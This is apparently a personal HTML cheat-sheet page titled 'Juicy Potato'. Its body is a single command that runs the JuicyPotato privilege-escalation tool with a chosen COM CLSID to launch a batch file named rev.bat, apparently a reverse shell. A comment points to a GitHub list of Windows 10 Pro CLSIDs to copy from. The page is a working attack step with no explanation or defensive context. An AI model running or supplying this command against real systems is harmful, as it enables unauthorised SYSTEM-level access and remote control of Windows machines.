<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Juicy Potato</title>
</head><body>JuicyPotato.exe -l 9997 -p C:\Users\Jack\Desktop\rev.bat -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} &nbsp;//<span style="color: #000000"><span style="font-family: Arial"><span style="font-size: 10pt"><b>&nbsp;</b></span></span></span><span style="font-family: Arial"><span style="font-size: 10pt"><b><span style="color: #1155cc">https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_10_Pro </span><span style="color: #000000">and copy a CLSID </span></b></span></span>&nbsp; <br/>
<br/>
<br/>
<br/>
</body></html>